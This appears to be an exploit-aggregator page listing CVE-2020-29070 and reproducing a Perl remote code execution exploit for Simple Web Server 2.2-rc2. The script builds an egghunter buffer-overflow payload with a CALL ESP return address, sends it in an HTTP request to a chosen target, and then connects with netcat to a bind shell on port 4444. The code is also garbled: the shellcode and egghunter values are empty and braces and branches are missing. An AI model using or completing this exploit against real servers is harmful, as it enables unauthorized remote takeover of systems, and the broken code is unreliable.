
Simple Web Server 2.2-rc2 Code Execution

CVE Category Price Severity
CVE-2020-29070 CWE-94 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2012-08-29
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.79331 0.95241

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

use IO::Socket;
# Exploit Title: SWS 2.2-rc2 - Remote code execution Egghunting + ASLR bypass
# Date: 28/8/2012
# Special Regards to Mr.pr0n ,Corelan team , immunity u guys are first !!! based on a POC by MR. Pr0n
# Author: Dhruval [email protected]
# Tested on Windows 7 32bit
# NOTE : If exploit is not running properly configure the server on other http ports like here i have used #8000 http ... and keep checking the server is "GREEN" enabled !
print "Exploit by Dhruval \n";
if (@ARGV != 2)
   print "\n[-] Usage: $0 <target ip> <port> \n\n";
$target = $ARGV[0]; # Target IP
$port   = $ARGV[1]; # Target port
$egghunter  =
"w00t". # The 4 byte tag!
# MSF windows/shell_bind_tcp LPORT=4444
$shellcode =
$junk       = "\x41" x (2048 - length("w00tw00t") - length($shellcode));
$ret        = pack('V',0x6FC8E251);         # CALL ESP - libstdc++-6.dll Non Aslr
#$ret = pack('V',0x7C82385D); #call ESP
#$ret = pack ('V',0x75560D1B); #call ESP ASLR AWARE :)
$nops       = "\x90" x 20;          # 20 nops.
$exploit    = $junk."w00tw00t".$shellcode.$ret.$nops.$egghunter;
if ($socket = IO::Socket::INET->new
     (PeerAddr => $target,
      PeerPort => $port,
      Proto => "TCP"))
   $header =
        "GET / HTTP/1.1\r\n".
        "Host: ".$target." \r\n".
    print "\n[+] Sending buffer (".(length($exploit))." bytes) to: $target:$port \n";
        print $socket $header."\r\n";
    print "[+] Exploitation Done!\n";
    print "[+] Please, wait couple of sec ...\n";
    print "[+] Got shell?\n\n";
        $command = "nc $target 4444";
        system ($command);
    print "[-] Connection to $target failed!\n";

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